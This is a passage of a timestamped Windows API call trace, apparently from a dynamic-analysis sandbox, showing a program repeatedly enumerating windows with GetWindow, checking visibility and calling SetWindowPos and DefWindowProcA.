[0057.468] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.468] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.468] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.468] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.468] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.469] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 
0x10130 [0057.469] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.469] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.469] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.469] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.469] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.469] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.469] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.469] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.469] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.469] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.469] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.469] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.469] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.469] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.469] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.469] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.469] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.469] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.469] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.469] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.469] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.469] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.469] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.469] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.469] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.469] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.469] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.469] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.469] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.469] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.469] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.470] GetWindow (hWnd=0x100f6, 
uCmd=0x2) returned 0x100f8 [0057.470] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.470] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.470] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.470] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.470] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.470] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.470] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.470] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.470] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.470] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.470] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.470] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.470] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.470] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.470] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.470] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.470] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.470] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.470] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.470] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.470] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.470] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.470] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.470] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.470] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.470] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.470] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.470] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.471] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.471] GetWindow (hWnd=0x10060, uCmd=0x2) 
returned 0x1003e [0057.471] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.471] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.471] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.471] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.471] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.471] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.471] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.471] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.471] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.471] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.471] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.471] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.471] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.471] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.471] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.471] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.471] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.471] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.471] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.471] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.471] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.471] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.471] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.471] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.471] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.471] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.472] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.472] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.472] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.472] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.472] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.472] GetWindow (hWnd=0x1017c, 
uCmd=0x2) returned 0x1017e [0057.472] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.472] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.472] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.472] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.472] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.472] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.472] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.472] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.472] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.472] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.472] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.472] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.472] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.472] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.472] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.472] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.472] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.473] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.473] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.473] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.473] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.473] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.473] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.473] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.473] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.473] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.473] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.473] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.473] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.473] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.473] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.473] 
GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.473] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.473] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.473] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.473] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.473] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.473] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.473] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.473] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.473] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.473] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.474] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.474] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.474] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.474] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.474] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.474] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.474] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.474] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.474] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.474] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.474] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.474] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.474] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.474] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.474] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.474] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.474] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.474] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.474] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.474] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.474] GetWindow (hWnd=0x10062, uCmd=0x2) returned 
0x10050 [0057.474] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.474] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.474] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.475] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.475] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.475] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.475] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.475] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.475] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.475] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.475] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.475] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.475] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.475] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.475] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.475] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.475] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.475] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.475] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.475] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.475] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.475] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.476] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.476] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.476] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.476] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.476] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.476] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.476] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.476] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 
[0057.476] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.476] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.476] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.476] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.476] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.476] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.476] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.476] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.476] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.476] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.476] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.476] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.476] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.476] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.476] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.476] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.476] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.476] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.476] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.476] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.476] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.476] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.476] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.476] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.477] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.477] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.477] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.477] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.477] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.477] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.477] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.477] GetWindow (hWnd=0x10184, uCmd=0x2) returned 
0x10186 [0057.477] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.477] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.477] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.477] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.477] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.477] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.477] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.477] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.477] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.477] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.477] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.477] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.477] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.477] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.477] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.477] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.477] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.477] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.477] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.477] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.477] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.477] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.477] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.478] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.478] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.478] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.478] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.478] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.478] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.478] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.478] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.478] GetWindow (hWnd=0x1013e, 
uCmd=0x2) returned 0x10142 [0057.478] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.478] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.478] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.478] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.478] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.478] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.478] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.478] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.478] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.478] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.478] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.478] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.478] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.478] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.478] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.478] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.478] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.478] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.478] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.478] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.478] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.478] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.479] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.479] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.479] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.479] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.479] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.479] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.479] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.479] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.479] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.479] 
GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.479] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.479] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.479] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.479] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.479] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.479] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.479] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.479] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.479] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.479] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.479] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.479] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.479] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.479] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.479] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.479] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.479] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.479] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.479] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.479] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.480] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.480] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.480] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.480] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.480] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.480] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.480] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.480] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.480] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.480] GetWindow 
(hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.480] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.480] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.480] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.480] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.480] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.480] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.480] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.480] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.480] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.480] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.480] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.480] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.480] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.480] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.480] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.480] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.480] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.480] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.480] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.481] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.481] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.481] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.481] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.481] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.481] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.481] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.481] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.481] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.481] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.481] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.481] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.481] 
GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.481] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.481] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.481] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.481] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.481] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.481] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.481] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.481] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.481] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.481] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.481] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.481] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.482] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.482] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.482] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.482] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.482] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.482] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.482] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.482] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.482] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.482] GetWindow 